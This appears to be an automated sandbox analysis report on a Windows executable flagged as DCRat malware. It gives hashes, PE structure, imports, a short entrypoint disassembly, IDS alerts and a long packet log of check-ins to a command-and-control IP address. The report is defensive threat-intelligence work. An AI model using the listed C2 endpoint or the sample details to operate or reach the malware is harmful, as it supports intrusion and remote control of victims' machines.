SHA1:	D05ACF3E6BA8060EEADF91DA7C75ED41C20B32D3
SHA-256:	FE0E286986F12346CA7D30269F996F7100A23DBF48C9A8C7329844F12CCFBDCD
SHA-512:	3BE68921704687643C10366AC89ED849546CF53BE02D87A0A4BFD44F8CFFFD983E7D1018A013ACB95613174C929CCD4C196046323BE8F9AC8F523BD32BC93F70
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 76%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

\Device\Null

Download File

Process:	C:\Windows\System32\w32tm.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	151
Entropy (8bit):	4.846593202722112
Encrypted:	false
SSDEEP:	3:VLV993J+miJWEoJ8FXrX9Qu4vUAtFy6voP0XKvj:Vx993DEUQtBiH3GT
MD5:	CBFF8813033D3084DA4A6B233163E47A
SHA1:	534ED8AA65BF49C9C0EABDDF5391DCBD260F27AF
SHA-256:	93A68A5ABC0E0848A9491808418A086A6B7436775DA48708CF5B04C068B4498F
SHA-512:	2F0BE2D1A42E6EA79986895094F3587C834179BAB9344075AE693EF675D4EC6BEF023E564C6AC7A8CDF47124697E47BD932CA8DA217C95EE6FF1FAD04540A098
Malicious:	false
Preview:	Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 03/01/2025 12:58:53..12:58:53, error: 0x80072746.12:58:58, error: 0x80072746.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.458505357084236
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Mj6WEKda85.exe
File size:	1'244'405 bytes
MD5:	3a74d8f05d5e7a64227d5521d1eb23ae
SHA1:	46060405cba2d450b32f83af5eeb88afac4a0619
SHA256:	9bb5022b61ea87ba069406c1efc954c254de21483d55147c7ea2a87698b3a1d7
SHA512:	8a0b1b2181d5df73114778c6d02086fb9e71638ac6bf6c375f831f8bda954862632937c51f0caa657f968eeb83795f71a9aaff4f420195c7492c760d2f62f4dd
SSDEEP:	24576:Z2G/nvxW3WX8N3lmvm2Um2sLaF5yLVGCU8OYJ:ZbA3Blw3La6BGVG
TLSH:	15455A017E44CE12F0191633C2EF454447B4AC512AA6E72B7EBA377E69123937D1CAEB
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...*...._......._..'...._f.'...._..'..

File Icon


Icon Hash:	c69b1b999cdddd6c

Static PE Info

General

Entrypoint:	0x41ec40
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x5FC684D7 [Tue Dec 1 18:00:55 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	fcf1390e9ce472c7270447fc5c61a0c1

Entrypoint Preview

Instruction
call 00007FD1B0846919h
jmp 00007FD1B084632Dh
cmp ecx, dword ptr [0043E668h]
jne 00007FD1B08464A5h
ret
jmp 00007FD1B0846A9Eh
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007FD1B0839237h
mov dword ptr [esi], 00435580h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 00435588h
mov dword ptr [ecx], 00435580h
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
lea eax, dword ptr [ecx+04h]
mov dword ptr [ecx], 00435568h
push eax
call 00007FD1B084963Dh
pop ecx
ret
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007FD1B08391CEh
push 0043B704h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007FD1B0848D52h
int3
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007FD1B0846444h
push 0043B91Ch
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007FD1B0848D35h
int3
jmp 00007FD1B084AD83h
jmp dword ptr [00433260h]
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push 00421EB0h
push dword ptr fs:[00000000h]

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[C++] VS2015 UPD3.1 build 24215
[EXP] VS2015 UPD3.1 build 24215
[RES] VS2015 UPD3 build 24213
[LNK] VS2015 UPD3.1 build 24215

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x3c820	0x34	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3c854	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x63000	0x21710	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x85000	0x2268	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3aac0	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x35508	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x33000	0x260	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x3bdc4	0x120	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x310ea	0x31200	c5bf61bbedb6ad471e9dc6266398e965	False	0.583959526081425	data	6.708075396341128	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x33000	0xa612	0xa800	7980b588d5b28128a2f3c36cabe2ce98	False	0.45284598214285715	data	5.221742709250668	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3e000	0x23728	0x1000	201530c9e56f172adf2473053298d48f	False	0.36767578125	data	3.7088186669877685	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat	0x62000	0x188	0x200	c5d41d8f254f69e567595ab94266cfdc	False	0.4453125	data	3.2982538067961342	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x63000	0x21710	0x21800	1956c28fc62c6a6024bfd3b494eb93ee	False	0.6833022388059702	data	6.70775703165835	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x85000	0x2268	0x2400	c7a942b723cb29d9c02f7c611b544b50	False	0.7681206597222222	data	6.5548620101740545	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
PNG	0x635e4	0xb45	PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced	English	United States	1.0027729636048528
PNG	0x6412c	0x15a9	PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced	English	United States	0.9363390441839495
RT_ICON	0x656d8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 3779 x 3779 px/m			0.8342198581560284
RT_ICON	0x65b40	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 3779 x 3779 px/m			0.8180327868852459
RT_ICON	0x664c8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 3779 x 3779 px/m			0.8090994371482176
RT_ICON	0x67570	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 3779 x 3779 px/m			0.7752074688796681
RT_ICON	0x69b18	0x18898	Device independent bitmap graphic, 156 x 312 x 32, image size 97344, resolution 3779 x 3779 px/m			0.6786098065748627
RT_DIALOG	0x823b0	0x286	data	English	United States	0.5092879256965944
RT_DIALOG	0x82638	0x13a	data	English	United States	0.60828025477707
RT_DIALOG	0x82774	0xec	data	English	United States	0.6991525423728814
RT_DIALOG	0x82860	0x12e	data	English	United States	0.5927152317880795
RT_DIALOG	0x82990	0x338	data	English	United States	0.45145631067961167
RT_DIALOG	0x82cc8	0x252	data	English	United States	0.5757575757575758
RT_STRING	0x82f1c	0x1e2	data	English	United States	0.3900414937759336
RT_STRING	0x83100	0x1cc	data	English	United States	0.4282608695652174
RT_STRING	0x832cc	0x1b8	data	English	United States	0.45681818181818185
RT_STRING	0x83484	0x146	data	English	United States	0.5153374233128835
RT_STRING	0x835cc	0x446	data	English	United States	0.340036563071298
RT_STRING	0x83a14	0x166	data	English	United States	0.49162011173184356
RT_STRING	0x83b7c	0x152	data	English	United States	0.5059171597633136
RT_STRING	0x83cd0	0x10a	data	English	United States	0.49624060150375937
RT_STRING	0x83ddc	0xbc	data	English	United States	0.6329787234042553
RT_STRING	0x83e98	0xd6	data	English	United States	0.5747663551401869
RT_GROUP_ICON	0x83f70	0x4c	data			0.7894736842105263
RT_MANIFEST	0x83fbc	0x753	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.3957333333333333

Imports

DLL

Import

KERNEL32.dll

GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer

gdiplus.dll

GdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-03T17:01:59.274949+0100	2034194	ET MALWARE DCRAT Activity (GET)	1	192.168.2.5	49704	104.21.12.142	80	TCP
2025-01-03T17:02:28.427791+0100	2850862	ETPRO MALWARE DCRat Initial Checkin Server Response M4	1	104.21.12.142	80	192.168.2.5	49771	TCP
2025-01-03T17:04:17.833515+0100	2850862	ETPRO MALWARE DCRat Initial Checkin Server Response M4	1	104.21.12.142	80	192.168.2.5	49999	TCP
2025-01-03T17:05:26.786925+0100	2850862	ETPRO MALWARE DCRat Initial Checkin Server Response M4	1	104.21.12.142	80	192.168.2.5	50011	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 3, 2025 17:01:58.470978975 CET	49704	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:01:58.475920916 CET	80	49704	104.21.12.142	192.168.2.5
Jan 3, 2025 17:01:58.476114988 CET	49704	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:01:58.476496935 CET	49704	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:01:58.481311083 CET	80	49704	104.21.12.142	192.168.2.5
Jan 3, 2025 17:01:59.274832010 CET	80	49704	104.21.12.142	192.168.2.5
Jan 3, 2025 17:01:59.274878979 CET	80	49704	104.21.12.142	192.168.2.5
Jan 3, 2025 17:01:59.274930954 CET	80	49704	104.21.12.142	192.168.2.5
Jan 3, 2025 17:01:59.274949074 CET	49704	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:01:59.327562094 CET	49704	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:02:00.314981937 CET	49704	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:02:00.316113949 CET	49705	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:02:00.319843054 CET	80	49704	104.21.12.142	192.168.2.5
Jan 3, 2025 17:02:00.321115971 CET	80	49705	104.21.12.142	192.168.2.5
Jan 3, 2025 17:02:00.321216106 CET	49705	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:02:00.321329117 CET	49705	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:02:00.326190948 CET	80	49705	104.21.12.142	192.168.2.5
Jan 3, 2025 17:02:00.326306105 CET	80	49705	104.21.12.142	192.168.2.5
Jan 3, 2025 17:02:00.535478115 CET	80	49704	104.21.12.142	192.168.2.5
Jan 3, 2025 17:02:00.536457062 CET	49704	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:02:00.541358948 CET	80	49704	104.21.12.142	192.168.2.5
Jan 3, 2025 17:02:00.541414022 CET	80	49704	104.21.12.142	192.168.2.5
Jan 3, 2025 17:02:00.756141901 CET	80	49704	104.21.12.142	192.168.2.5
Jan 3, 2025 17:02:00.796333075 CET	49704	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:02:01.010272026 CET	80	49705	104.21.12.142	192.168.2.5
Jan 3, 2025 17:02:01.061924934 CET	49705	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:02:06.157363892 CET	49704	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:02:06.159161091 CET	49706	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:02:06.162594080 CET	80	49704	104.21.12.142	192.168.2.5
Jan 3, 2025 17:02:06.162671089 CET	49704	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:02:06.164050102 CET	80	49706	104.21.12.142	192.168.2.5
Jan 3, 2025 17:02:06.164133072 CET	49706	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:02:06.168746948 CET	49706	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:02:06.170814991 CET	49705	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:02:06.173666954 CET	80	49706	104.21.12.142	192.168.2.5
Jan 3, 2025 17:02:06.173841000 CET	80	49706	104.21.12.142	192.168.2.5
Jan 3, 2025 17:02:06.175966978 CET	80	49705	104.21.12.142	192.168.2.5
Jan 3, 2025 17:02:06.176027060 CET	49705	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:02:06.177062035 CET	49706	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:02:06.223248005 CET	80	49706	104.21.12.142	192.168.2.5
Jan 3, 2025 17:02:06.526350021 CET	80	49706	104.21.12.142	192.168.2.5
Jan 3, 2025 17:02:06.526412964 CET	49706	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:02:11.190023899 CET	49711	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:02:11.195072889 CET	80	49711	104.21.12.142	192.168.2.5
Jan 3, 2025 17:02:11.201401949 CET	49711	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:02:11.201867104 CET	49711	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:02:11.206764936 CET	80	49711	104.21.12.142	192.168.2.5
Jan 3, 2025 17:02:11.206983089 CET	80	49711	104.21.12.142	192.168.2.5
Jan 3, 2025 17:02:11.894176960 CET	80	49711	104.21.12.142	192.168.2.5
Jan 3, 2025 17:02:11.936975002 CET	49711	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:02:16.921807051 CET	49711	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:02:16.922703981 CET	49737	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:02:16.927076101 CET	80	49711	104.21.12.142	192.168.2.5
Jan 3, 2025 17:02:16.927587986 CET	80	49737	104.21.12.142	192.168.2.5
Jan 3, 2025 17:02:16.932957888 CET	49711	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:02:16.932984114 CET	49737	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:02:16.933132887 CET	49737	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:02:16.937962055 CET	80	49737	104.21.12.142	192.168.2.5
Jan 3, 2025 17:02:16.938160896 CET	80	49737	104.21.12.142	192.168.2.5
Jan 3, 2025 17:02:17.646152020 CET	80	49737	104.21.12.142	192.168.2.5
Jan 3, 2025 17:02:17.687124014 CET	49737	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:02:22.672692060 CET	49771	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:02:22.677548885 CET	80	49771	104.21.12.142	192.168.2.5
Jan 3, 2025 17:02:22.680963039 CET	49771	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:02:22.681060076 CET	49771	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:02:22.685821056 CET	80	49771	104.21.12.142	192.168.2.5
Jan 3, 2025 17:02:22.686011076 CET	80	49771	104.21.12.142	192.168.2.5
Jan 3, 2025 17:02:23.399913073 CET	80	49771	104.21.12.142	192.168.2.5
Jan 3, 2025 17:02:23.407643080 CET	49737	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:02:23.452574015 CET	49771	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:02:28.422454119 CET	49771	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:02:28.423135042 CET	49808	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:02:28.427791119 CET	80	49771	104.21.12.142	192.168.2.5
Jan 3, 2025 17:02:28.427860975 CET	49771	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:02:28.427956104 CET	80	49808	104.21.12.142	192.168.2.5
Jan 3, 2025 17:02:28.428039074 CET	49808	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:02:28.428152084 CET	49808	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:02:28.433084965 CET	80	49808	104.21.12.142	192.168.2.5
Jan 3, 2025 17:02:28.433203936 CET	80	49808	104.21.12.142	192.168.2.5
Jan 3, 2025 17:02:29.188045979 CET	80	49808	104.21.12.142	192.168.2.5
Jan 3, 2025 17:02:29.233807087 CET	49808	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:02:34.203797102 CET	49808	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:02:34.204051018 CET	49844	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:02:34.208844900 CET	80	49808	104.21.12.142	192.168.2.5
Jan 3, 2025 17:02:34.208856106 CET	80	49844	104.21.12.142	192.168.2.5
Jan 3, 2025 17:02:34.208926916 CET	49808	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:02:34.208959103 CET	49844	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:02:34.209156990 CET	49844	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:02:34.213965893 CET	80	49844	104.21.12.142	192.168.2.5
Jan 3, 2025 17:02:34.214091063 CET	80	49844	104.21.12.142	192.168.2.5
Jan 3, 2025 17:02:34.941063881 CET	80	49844	104.21.12.142	192.168.2.5
Jan 3, 2025 17:02:34.983807087 CET	49844	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:02:39.953114033 CET	49844	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:02:39.953890085 CET	49885	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:02:39.958350897 CET	80	49844	104.21.12.142	192.168.2.5
Jan 3, 2025 17:02:39.958416939 CET	49844	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:02:39.958710909 CET	80	49885	104.21.12.142	192.168.2.5
Jan 3, 2025 17:02:39.958780050 CET	49885	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:02:39.958923101 CET	49885	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:02:39.963754892 CET	80	49885	104.21.12.142	192.168.2.5
Jan 3, 2025 17:02:39.963816881 CET	80	49885	104.21.12.142	192.168.2.5
Jan 3, 2025 17:02:40.670352936 CET	80	49885	104.21.12.142	192.168.2.5
Jan 3, 2025 17:02:40.718142986 CET	49885	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:02:45.672003984 CET	49885	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:02:45.672748089 CET	49920	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:02:45.677112103 CET	80	49885	104.21.12.142	192.168.2.5
Jan 3, 2025 17:02:45.677169085 CET	49885	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:02:45.677548885 CET	80	49920	104.21.12.142	192.168.2.5
Jan 3, 2025 17:02:45.677617073 CET	49920	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:02:45.677755117 CET	49920	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:02:45.682493925 CET	80	49920	104.21.12.142	192.168.2.5
Jan 3, 2025 17:02:45.682647943 CET	80	49920	104.21.12.142	192.168.2.5
Jan 3, 2025 17:02:46.408647060 CET	80	49920	104.21.12.142	192.168.2.5
Jan 3, 2025 17:02:46.452514887 CET	49920	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:02:51.422086000 CET	49920	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:02:51.423517942 CET	49958	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:02:51.427256107 CET	80	49920	104.21.12.142	192.168.2.5
Jan 3, 2025 17:02:51.428356886 CET	80	49958	104.21.12.142	192.168.2.5
Jan 3, 2025 17:02:51.428437948 CET	49920	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:02:51.428476095 CET	49958	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:02:51.429416895 CET	49958	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:02:51.434218884 CET	80	49958	104.21.12.142	192.168.2.5
Jan 3, 2025 17:02:51.434386969 CET	80	49958	104.21.12.142	192.168.2.5
Jan 3, 2025 17:02:52.138631105 CET	80	49958	104.21.12.142	192.168.2.5
Jan 3, 2025 17:02:52.186897039 CET	49958	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:02:57.140646935 CET	49958	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:02:57.141477108 CET	49984	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:02:57.147897959 CET	80	49958	104.21.12.142	192.168.2.5
Jan 3, 2025 17:02:57.147912979 CET	80	49984	104.21.12.142	192.168.2.5
Jan 3, 2025 17:02:57.148108959 CET	49958	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:02:57.148150921 CET	49984	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:02:57.148303032 CET	49984	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:02:57.153074980 CET	80	49984	104.21.12.142	192.168.2.5
Jan 3, 2025 17:02:57.153232098 CET	80	49984	104.21.12.142	192.168.2.5
Jan 3, 2025 17:02:57.844818115 CET	80	49984	104.21.12.142	192.168.2.5
Jan 3, 2025 17:02:57.890016079 CET	49984	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:03:02.859288931 CET	49984	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:03:02.860455036 CET	49987	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:03:02.864517927 CET	80	49984	104.21.12.142	192.168.2.5
Jan 3, 2025 17:03:02.864579916 CET	49984	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:03:02.865263939 CET	80	49987	104.21.12.142	192.168.2.5
Jan 3, 2025 17:03:02.865350962 CET	49987	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:03:02.865580082 CET	49987	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:03:02.872386932 CET	80	49987	104.21.12.142	192.168.2.5
Jan 3, 2025 17:03:02.872395992 CET	80	49987	104.21.12.142	192.168.2.5
Jan 3, 2025 17:03:03.574347019 CET	80	49987	104.21.12.142	192.168.2.5
Jan 3, 2025 17:03:03.624444008 CET	49987	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:03:08.578176022 CET	49987	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:03:08.578876019 CET	49988	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:03:08.583261013 CET	80	49987	104.21.12.142	192.168.2.5
Jan 3, 2025 17:03:08.583359957 CET	49987	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:03:08.583798885 CET	80	49988	104.21.12.142	192.168.2.5
Jan 3, 2025 17:03:08.583885908 CET	49988	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:03:08.583969116 CET	49988	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:03:08.588774920 CET	80	49988	104.21.12.142	192.168.2.5
Jan 3, 2025 17:03:08.588947058 CET	80	49988	104.21.12.142	192.168.2.5
Jan 3, 2025 17:03:09.303721905 CET	80	49988	104.21.12.142	192.168.2.5
Jan 3, 2025 17:03:09.358776093 CET	49988	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:03:14.312633038 CET	49988	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:03:14.313721895 CET	49989	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:03:14.317593098 CET	80	49988	104.21.12.142	192.168.2.5
Jan 3, 2025 17:03:14.317677975 CET	49988	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:03:14.318552971 CET	80	49989	104.21.12.142	192.168.2.5
Jan 3, 2025 17:03:14.318674088 CET	49989	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:03:14.318795919 CET	49989	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:03:14.323632002 CET	80	49989	104.21.12.142	192.168.2.5
Jan 3, 2025 17:03:14.323708057 CET	80	49989	104.21.12.142	192.168.2.5
Jan 3, 2025 17:03:15.032783031 CET	80	49989	104.21.12.142	192.168.2.5
Jan 3, 2025 17:03:15.077528954 CET	49989	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:03:20.046766996 CET	49989	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:03:20.047543049 CET	49990	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:03:20.051769018 CET	80	49989	104.21.12.142	192.168.2.5
Jan 3, 2025 17:03:20.051841974 CET	49989	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:03:20.052440882 CET	80	49990	104.21.12.142	192.168.2.5
Jan 3, 2025 17:03:20.052521944 CET	49990	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:03:20.052617073 CET	49990	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:03:20.057342052 CET	80	49990	104.21.12.142	192.168.2.5
